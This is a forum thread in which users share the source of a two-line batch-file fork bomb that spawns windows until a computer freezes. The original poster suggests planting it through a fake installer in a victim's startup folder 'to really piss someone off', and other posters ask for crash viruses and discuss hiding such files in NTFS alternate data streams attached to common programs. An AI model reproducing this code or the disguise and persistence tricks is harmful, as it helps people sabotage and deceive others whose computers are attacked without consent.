Yes
No votes
No
100%

Total votes: 2

ShawnREV

Source for a self-replicating window virus

Post by ShawnREV »

Ok, so me and my friend have been getting to know the good old DOS command prompt and figured out this simple but annoying .bat file that, when opened, repeatedly spawns windows until the computer freezes. heres the source...

start spam.bat
spam.bat

you can change the spam.bat part to what ever you like, but make sure that the name of the file and the source are the same. if you want to call the file virus, you would save the file as virus.bat and change the source text to virus.bat. If you want to really piss someone off and have them have to call the IT department or the local computer store, you can make a fake installer that installs the .bat file to the startup folder so that it will start ever time the person starts their computer.

Best of luck,
ShawnREV
SysAdmin... a god among mortals.
koolpop0

Post by koolpop0 »

isnt that like my notepad virus?

where it calls 1 billion notepads

ps figure out how to hide in background and you will have a very good annoying progy
jack krauser

Re: Source for a self-replicating window virus

Post by jack krauser »

ShawnREV wrote:Ok, so me and my friend have been getting to know the good old DOS command prompt and figured out this simple but annoying .bat file that, when opened, repeatedly spawns windows until the computer freezes. heres the source...

start spam.bat
spam.bat

you can change the spam.bat part to what ever you like, but make sure that the name of the file and the source are the same. if you want to call the file virus, you would save the file as virus.bat and change the source text to virus.bat. If you want to really piss someone off and have them have to call the IT department or the local computer store, you can make a fake installer that installs the .bat file to the startup folder so that it will start ever time the person starts their computer.

Best of luck,
ShawnREV
sorry dude i already know this virus :twisted: anything else :?: and plz a good virus, like crash or prank virus :wink: :twisted:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
saints

Post by saints »

koolpop0 wrote:isnt that like my notepad virus?

ps figure out how to hide in background and you will have a very good annoying progy

Could you use the NTFS alt data stream for Windows to hide them? Maybe attach it to a word.exe or someother .exe file the user would use.
I will try and see I can do it with NTFS alt data streams.
jack krauser

Post by jack krauser »

saints wrote:
koolpop0 wrote:isnt that like my notepad virus?

Could you use the NTFS alt data stream for Windows to hide them? Maybe attach it to a word.exe or someother .exe file the user would use.
I will try and see I can do it with NTFS alt data streams.
i'm not sure but maybe... :?
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark